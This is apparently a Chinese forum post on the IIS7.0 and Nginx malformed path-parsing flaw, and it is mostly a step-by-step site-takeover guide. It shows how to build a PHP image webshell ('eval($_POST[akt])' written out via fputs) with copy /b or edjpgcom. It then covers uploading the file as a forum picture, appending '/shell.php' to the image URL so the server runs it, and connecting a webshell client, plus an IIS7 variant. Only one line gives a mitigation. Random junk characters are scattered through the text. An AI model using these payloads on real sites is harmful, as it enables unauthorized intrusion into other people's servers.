IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0 : s1 t! ?) e; K- c( _: e
Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。5 Z2 K; h7 @. G L
__________________________________ ) u- K% Q& |5 u7 u+ ?2 {
9 J# n; J2 K, A! i* Q; g
先说一下Nginx那个0day(出来有几天了,因为介绍的网站很多,所以当时就没转载) # T; f4 J0 r1 C7 t$ O) h
先合并一张PHP一句话图片马,合并方法: L8 f* T; H0 t- j& G8 j
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
- n( ?" C- M. m4 R- C% j②、用edjpgcom,进行图片和一句话木马的合并,一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval($_POST[akt]);?>")?>" 3 K k4 i6 X- C4 v* O7 ]
图片随便找一张.
* p5 r$ d; j6 h5 P7 V2 e一句话:<?php fputs(fopen(shell.php,w),<?php eval($_POST[akt])?>);?> 4 J' E% j7 i( N5 N2 V1 Q$ S2 J2 U8 X
然后找个nginx的站,先注册一个用户然后在论坛上传一张我们刚刚合并的图片一句话马。 & J* _& @9 L* h% ]
找到图片地址,然后在地址后面加个shell.php,在浏览器中运行。
# R3 G2 S( Q( O5 Z6 B$ e比如假设图片地址为 http://www.political-security.com/tupian/1.jpg
% o8 t! ~( T9 U0 C: s2 Y则执行地址为 http://www.political-security.com/tupian/1.jpg/shell.php
, e4 a; a, F& a9 }然后,会在目录下生成shell.php。比如: www.political-security.com/tupian/shell.php * k: e+ \+ E7 t; ^+ k, t6 y; v
shell.php就是我们的一句话地址。再拿一句话的客户端连接这个一句话地址就好。 ! e7 ~! C. @% d( \% ] U
上面就是Nginx拿站全过程,IIS7.0的畸形解析和这个类似。
! u$ N0 K: t+ A, y9 e找到某个使用IIS7.0架设的站,然后找到其中的图片上传点(不需要管理权限,普通注册用户即可搞定),把PHP大马后缀改成.jpg,传上去,得到图片地址。 ( @ r7 p/ c7 d! u/ y
在图片格式后面添加xx.php xx随便你怎么填。只要后缀为.php就好。 3 Z. Z0 \" \1 Z& `' o
剩下的就随便你去搞吧。* E% [1 \# k' r* [6 p7 b
! k& f; F' X1 Q! \ |